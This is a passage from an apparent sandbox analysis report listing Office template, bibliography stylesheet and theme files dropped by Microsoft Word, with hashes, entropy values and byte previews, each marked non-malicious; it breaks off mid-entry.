                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F10.tmp\turabian.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):344303
                                                                                                                                                        Entropy (8bit):5.023195898304535
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                        MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                        SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                        SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                        SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F20.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):314
                                                                                                                                                        Entropy (8bit):3.5230842510951934
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                                                                                                                        SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                                                                                                                        SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                                                                                                                        SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F20.tmp\ieee2006officeonline.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):294178
                                                                                                                                                        Entropy (8bit):4.977758311135714
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                        MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                        SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                        SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                        SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F41.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):274
                                                                                                                                                        Entropy (8bit):3.438490642908344
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                        MD5:0F98498818DC28E82597356E2650773C
                                                                                                                                                        SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                                                                                                                        SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                                                                                                                        SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F41.tmp\Element design set.dotx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):34415
                                                                                                                                                        Entropy (8bit):7.352974342178997
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                        MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                        SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                        SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                        SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F42.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):374
                                                                                                                                                        Entropy (8bit):3.5414485333689694
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                                                                                                                        MD5:2F7A8FE4E5046175500AFFA228F99576
                                                                                                                                                        SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                                                                                                                        SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                                                                                                                        SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F42.tmp\Text Sidebar (Annual Report Red and Black design).docx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):47296
                                                                                                                                                        Entropy (8bit):6.42327948041841
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                        MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                        SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                        SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                        SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F62.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):286
                                                                                                                                                        Entropy (8bit):3.538396048757031
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:149948E41627BE5DC454558E12AF2DA4
                                                                                                                                                        SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                                                                                                                        SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                                                                                                                        SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F62.tmp\sist02.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):250983
                                                                                                                                                        Entropy (8bit):5.057714239438731
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                        MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                        SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                        SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                        SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F82.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):258
                                                                                                                                                        Entropy (8bit):3.4692172273306268
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                                                                                        MD5:C1B36A0547FB75445957A619201143AC
                                                                                                                                                        SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                                                                                        SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                                                                                        SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7F82.tmp\pictureorgchart.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):7370
                                                                                                                                                        Entropy (8bit):7.9204386289679745
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                        MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                        SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                        SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                        SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8071.tmp\View.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):486596
                                                                                                                                                        Entropy (8bit):7.668294441507828
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                        MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                        SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                        SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                        SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8071.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):274
                                                                                                                                                        Entropy (8bit):3.535303979138867
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                                                                                        SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                                                                                        SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                                                                                        SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8083.tmp\Dividend.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):570901
                                                                                                                                                        Entropy (8bit):7.674434888248144
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                        MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                        SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                        SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                        SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD8083.tmp\content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):282
                                                                                                                                                        Entropy (8bit):3.5459495297497368
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                                                                                        MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                                                                                        SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                                                                                        SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                                                                                        SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD80A4.tmp\Basis.thmx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):558035
                                                                                                                                                        Entropy (8bit):7.696653383430889
                                                                                                                                                        Encrypted:false
